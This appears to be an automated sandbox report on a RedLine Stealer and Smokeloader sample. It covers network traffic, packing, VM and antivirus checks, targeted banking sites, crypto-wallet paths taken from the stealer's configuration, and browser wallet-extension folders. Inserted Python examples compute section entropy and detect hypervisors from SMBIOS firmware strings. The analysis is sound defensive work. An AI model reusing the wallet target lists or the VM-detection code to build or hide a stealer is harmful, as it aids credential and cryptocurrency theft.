Source: unknown | HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49746 version: TLS 1.2

            System Summary

            Source: 00000004.00000002.1650950894.0000000000678000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000004.00000002.1651366354.0000000002100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Code function: 4_3_0070DDF8
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 616
            Source: 4JPKDcwtDo.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000004.00000002.1650950894.0000000000678000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000004.00000002.1651366354.0000000002100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 4JPKDcwtDo.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@2/5@3/1
            Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7120
            Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\fe107cd5-e499-4b8c-a991-c764d95e1000
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1308922639.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1309017688.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1321165449.0000000002D24000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 4JPKDcwtDo.exe | ReversingLabs: Detection: 60%
            Source: 4JPKDcwtDo.exe | Virustotal: Detection: 56%
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | File read: C:\Users\user\Desktop\4JPKDcwtDo.exe
            Source: unknown | Process created: C:\Users\user\Desktop\4JPKDcwtDo.exe "C:\Users\user\Desktop\4JPKDcwtDo.exe"
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 616
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: msimg32.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: msvcr100.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: ondemandconnroutehelper.dll (loaded repeatedly)
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: webio.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

            Data Obfuscation

            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Unpacked PE file: 4.2.4JPKDcwtDo.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Unpacked PE file: 4.2.4JPKDcwtDo.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Code function: 4_3_0070C969 push ebp; ret 4_3_0070C97A
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Code function: 4_3_00716EC7 push cs; iretd 4_3_00716EC8
            Source: 4JPKDcwtDo.exe | Static PE information: section name: .text entropy: 7.433590009651865
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (logged repeatedly)
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (logged repeatedly)
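The two static checks behind the findings in this section, as an added example (not code from the report, the sandbox or the sample): Shannon entropy of a section, which is what the 7.43 bits/byte score for .text measures, and a byte scan for the push ebp; ret (55 C3) and push cs; iretd (0E CF) sequences the report lists. The 7.0 "looks packed" threshold is a common rule of thumb, not a value from the report, and the sample sections are constructed for illustration.

```python
"""Section entropy and push/ret gadget scan (added example, constructed inputs)."""
import hashlib
import math
from collections import Counter

# Packed or encrypted code usually scores above this (assumed threshold).
PACKED_ENTROPY_THRESHOLD = 7.0

# Byte encodings of the two sequences the report flags (standard x86 forms).
OBFUSCATION_GADGETS = {
    b"\x55\xc3": "push ebp; ret",
    b"\x0e\xcf": "push cs; iretd",
}


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for constant data, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def section_looks_packed(data: bytes, threshold: float = PACKED_ENTROPY_THRESHOLD) -> bool:
    """True when a section's entropy is in the range typical of packed/encrypted code."""
    return shannon_entropy(data) >= threshold


def find_obfuscation_gadgets(code: bytes) -> list[tuple[int, str]]:
    """Return (offset, mnemonic) for every push/ret-style gadget, sorted by offset."""
    hits = []
    for pattern, mnemonic in OBFUSCATION_GADGETS.items():
        start = 0
        while (idx := code.find(pattern, start)) != -1:
            hits.append((idx, mnemonic))
            start = idx + 1
    return sorted(hits)


def _pseudo_random_bytes(n: int, seed: bytes = b"4JPKDcwtDo") -> bytes:
    """Deterministic high-entropy filler standing in for a packed section (constructed)."""
    out = bytearray()
    block = seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


# Constructed stand-ins: a plain section made of a repeated prologue plus zero padding,
# and a "packed" section of pseudo-random bytes.
PLAIN_TEXT = b"\x55\x8b\xec\x83\xec\x10" * 64 + b"\x00" * 128
PACKED_TEXT = _pseudo_random_bytes(8192)
# Constructed stub: a normal prologue, then the two gadgets at offsets 8 and 13.
OBFUSCATED_STUB = b"\x55\x8b\xec" + b"\x90" * 5 + b"\x55\xc3" + b"\x90" * 3 + b"\x0e\xcf"

if __name__ == "__main__":
    for name, blob in (("plain", PLAIN_TEXT), ("packed", PACKED_TEXT)):
        print(f"{name}: entropy={shannon_entropy(blob):.3f} packed={section_looks_packed(blob)}")
    for off, mnemonic in find_obfuscation_gadgets(OBFUSCATED_STUB):
        print(f"gadget at +0x{off:x}: {mnemonic}")
```

On a real binary, run `shannon_entropy` over each section's raw bytes (for example via pefile's `get_data()`) rather than the whole file; the .text score in the report is per section, and a high-entropy .rsrc or overlay says something different from a high-entropy .text.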

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | System information queried: FirmwareTableInformation
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe TID: 7356 | Thread sleep time: -30000s >= -30000s (logged twice)
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: Amcache.hve.11.dr | Binary or memory string: VMware
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: 4JPKDcwtDo.exe, 00000004.00000002.1650981832.00000000006BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWx
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696492231s
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696492231
            Source: Amcache.hve.11.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696492231
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: 4JPKDcwtDo.exe, 4JPKDcwtDo.exe, 00000004.00000003.1352162990.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1363898461.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000002.1650981832.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1401175680.0000000000708000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696492231t
            Source: Amcache.hve.11.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696492231f
            Source: Amcache.hve.11.dr | Binary or memory string: vmci.sys
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696492231
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696492231x
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696492231o
            Source: Amcache.hve.11.dr | Binary or memory string: VMware20,1
            Source: Amcache.hve.11.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.11.dr | Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.11.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: Amcache.hve.11.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.11.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.11.dr | Binary or memory string: VMware PCI VMCI Bus Device
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: Amcache.hve.11.dr | Binary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.11.dr | Binary or memory string: VMware Virtual RAM
            Source: Amcache.hve.11.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: Amcache.hve.11.dr | Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: Amcache.hve.11.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: Amcache.hve.11.dr | Binary or memory string: VMware Virtual USB Mouse
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: Amcache.hve.11.dr | Binary or memory string: vmci.syshbin
            Source: Amcache.hve.11.dr | Binary or memory string: VMware, Inc.
            Source: Amcache.hve.11.dr | Binary or memory string: VMware20,1hbin@
            Source: Amcache.hve.11.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: Amcache.hve.11.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.11.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696492231p
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: Amcache.hve.11.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.11.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696492231j
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: Amcache.hve.11.dr | Binary or memory string: vmci.syshbin`
            Source: Amcache.hve.11.dr | Binary or memory string: \driver\vmci,\driver\pci
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: Amcache.hve.11.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.11.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: Amcache.hve.11.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.11.dr | Binary or memory string: msmpeng.exe
            Source: Amcache.hve.11.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.11.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1363898461.00000000006D0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: Amcache.hve.11.dr | Binary or memory string: MsMpEng.exe
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
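To show what the Win32_BIOS and FirmwareTableInformation checks above actually read, here is an added example (not the report's or the sample's code) that walks a raw SMBIOS table and reports hypervisor vendor markers. Both tables are constructed: the VM one reuses the BIOS and system strings the report recovered from the analysis machine's Amcache, the "physical" one uses made-up values, and the marker list is an assumption about what a VM-aware sample looks for. `read_live_smbios` is the Windows call that returns the real table and is only invoked when the script runs on Windows.

```python
"""Walk a raw SMBIOS table and flag hypervisor vendor strings (added example)."""
import struct
import sys

# Assumed marker list. The analysis VM's own firmware advertises 'VMware, Inc.'
# and 'VMware20,1'; a Hyper-V guest typically shows 'Virtual Machine'.
HYPERVISOR_MARKERS = ("vmware", "virtualbox", "innotek", "qemu", "bochs",
                      "hyper-v", "virtual machine", "kvm", "xen", "parallels")


def smbios_structures(table: bytes) -> list[tuple[int, list[str]]]:
    """Return (type, strings) per structure.  Each structure is a 4-byte header
    (type, length, handle) plus formatted data up to `length`, then NUL-terminated
    strings closed by an extra NUL (an empty string set is two NULs)."""
    out = []
    off = 0
    while off + 4 <= len(table):
        stype, length = table[off], table[off + 1]
        if length < 4:
            raise ValueError(f"bad structure length {length} at offset {off}")
        off += length
        strings = []
        while off < len(table) and table[off] != 0:
            end = table.index(0, off)
            strings.append(table[off:end].decode("ascii", "replace"))
            off = end + 1
        off += 1 if strings else 2          # skip the string-set terminator
        out.append((stype, strings))
        if stype == 127:                    # End-of-Table structure
            break
    return out


def firmware_vm_markers(table: bytes) -> list[str]:
    """Sorted list of hypervisor markers found in any SMBIOS string."""
    found = set()
    for _, strings in smbios_structures(table):
        for s in strings:
            low = s.lower()
            found.update(m for m in HYPERVISOR_MARKERS if m in low)
    return sorted(found)


def _structure(stype: int, handle: int, formatted_tail: bytes, strings: list[str]) -> bytes:
    """Build one SMBIOS structure (helper for the constructed tables)."""
    header = struct.pack("<BBH", stype, 4 + len(formatted_tail), handle)
    string_set = b"".join(s.encode("ascii") + b"\x00" for s in strings) + b"\x00"
    if not strings:
        string_set = b"\x00\x00"
    return header + formatted_tail + string_set


def _table(bios: tuple[str, str, str], system: tuple[str, str, str, str]) -> bytes:
    # Type 0, BIOS Information: vendor/version/release date are string indices 1..3;
    # the other formatted fields are zeroed (total length 0x18).
    t0 = _structure(0, 0x0000, bytes([1, 2]) + b"\x00\xE0" + bytes([3]) + b"\x00" * 15, list(bios))
    # Type 1, System Information: manufacturer/product/version/serial are indices 1..4,
    # then a 16-byte UUID, wake-up type, SKU and family (total length 0x1B).
    t1 = _structure(1, 0x0001, bytes([1, 2, 3, 4]) + b"\x00" * 16 + b"\x06" + b"\x00\x00", list(system))
    t127 = _structure(127, 0x0002, b"", [])
    return t0 + t1 + t127


# Constructed from the firmware strings the report recovered from the analysis VM.
VM_SMBIOS = _table(
    ("VMware, Inc.", "VMW201.00V.20829224.B64.2211211842", "11/21/2022"),
    ("VMware, Inc.", "VMware20,1", "None", "VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d"),
)
# Constructed physical-looking baseline; values are made up.
PHYSICAL_SMBIOS = _table(
    ("American Megatrends Inc.", "1.07", "03/14/2023"),
    ("Example Laptops Ltd", "Model X1", "1.0", "EX1-000123"),
)


def read_live_smbios() -> bytes:
    """Windows only: the raw table via GetSystemFirmwareTable('RSMB'), the same
    data the sample's FirmwareTableInformation query exposes."""
    if sys.platform != "win32":
        raise OSError("GetSystemFirmwareTable is only available on Windows")
    import ctypes
    k32 = ctypes.windll.kernel32
    sig = 0x52534D42                                  # 'RSMB'
    size = k32.GetSystemFirmwareTable(sig, 0, None, 0)
    buf = ctypes.create_string_buffer(size)
    k32.GetSystemFirmwareTable(sig, 0, buf, size)
    # RawSMBIOSData: Used20CallingMethod, Major, Minor, DmiRevision (1 byte each), Length (4)
    length = struct.unpack_from("<I", buf.raw, 4)[0]
    return buf.raw[8:8 + length]


if __name__ == "__main__":
    for name, tbl in (("constructed VM", VM_SMBIOS), ("constructed physical", PHYSICAL_SMBIOS)):
        print(name, firmware_vm_markers(tbl) or "no hypervisor markers")
    if sys.platform == "win32":
        print("this host", firmware_vm_markers(read_live_smbios()) or "no hypervisor markers")
```

The same strings reach WMI consumers through Win32_BIOS and Win32_ComputerSystem, so a sandbox that patches only the WMI layer still leaks through the raw firmware table; run the script on the analysis VM to see exactly what the sample saw.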

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: 4JPKDcwtDo.exe PID: 7120, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: 4JPKDcwtDo.exeString found in binary or memory: "m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520
            Source: 4JPKDcwtDo.exeString found in binary or memory: Wallets/ElectronCash
            Source: 4JPKDcwtDo.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
            Source: 4JPKDcwtDo.exeString found in binary or memory: window-state.json
            Source: 4JPKDcwtDo.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: 4JPKDcwtDo.exeString found in binary or memory: Wallets/Exodus
            Source: 4JPKDcwtDo.exeString found in binary or memory: Wallets/Ethereum
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1352285940.00000000006EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: 4JPKDcwtDo.exeString found in binary or memory: keystore
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\4JPKDcwtDo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
